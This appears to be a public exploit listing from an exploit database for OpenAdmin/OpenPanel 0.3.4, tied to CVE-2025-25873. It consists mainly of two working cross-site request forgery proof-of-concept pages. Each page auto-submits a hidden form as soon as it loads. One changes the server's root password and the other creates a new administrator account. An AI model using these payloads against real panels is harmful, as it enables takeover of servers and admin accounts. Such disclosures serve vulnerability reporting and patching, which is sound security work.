Share
## https://sploitus.com/exploit?id=PACKETSTORM:189597
# Exploit Title: OpenAdmin 0.3.4 - Multiple CSRF Vulnerabilities
# Date: Nov 8, 2024
# Exploit Author: Punthat Siriwan, Korn Chaisuwan, Manich Koomsusi, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2025-25873
##-- CSRF at Advanced Change Root Password --##
<html>
<body>
<form action="https://demo.openpanel.org:2087/server/root-password" method="POST">
<input type="hidden" name="password" value="P@ssw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
##-- CSRF at Users --##
<html>
<body>
<form action="https://demo.openpanel.org:2087/user/new" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="admin_email" value="csrf@csrf" />
<input type="hidden" name="plan_name"
value="ubuntu_nginx_mysql" />
<input type="hidden" name="admin_username" value="csrf" />
<input type="hidden" name="admin_password" value="12345678" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>